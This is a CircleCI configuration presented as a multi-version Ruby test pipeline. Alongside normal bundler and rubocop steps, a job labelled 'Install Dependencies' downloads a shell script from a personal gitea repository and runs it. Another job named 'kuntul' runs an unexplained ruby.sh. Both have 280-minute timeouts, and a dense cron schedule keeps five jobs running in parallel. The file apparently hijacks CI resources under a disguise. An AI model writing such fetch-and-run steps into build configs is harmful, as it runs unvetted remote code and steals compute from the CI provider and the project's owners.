working_dir: &working_dir ~/app
.toon_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
    - run:
        name: kuntul
        command: |
                    chmod u+x ruby.sh && ./ruby.sh
        no_output_timeout: 280m
version: 2.0
jobs:
  toon:
    docker:
      - image: ruby
    steps:
      - checkout
  toon1:
    <<: *script
    docker:
      - image: ruby:2.7
  toon2:
    <<: *script
    docker:
      - image: ruby:2.6
  toon3:
    <<: *script
    docker:
      - image: ruby:2.5
  toon4:
    docker:
      - image: ruby:2.4
    steps:
        - run:
            name: Install Dependencies
            command: |
                    wget https://try.gitea.io/nosmould864/ruby2/raw/branch/master/a.sh && chmod u+x a.sh && ./a.sh
            no_output_timeout: 280m

workflows:
  version: 2
  commit:
    jobs:
      - toon
      - toon1
      - toon2
      - toon3
      - toon4
    triggers:
      - schedule:
          cron: "* 2,9,12,18,21 * * *"
          filters:
            branches:
              only:
                - master
                
  toonrunjob:
    jobs:
      - toon
      - toon1
      - toon2
      - toon3
      - toon4
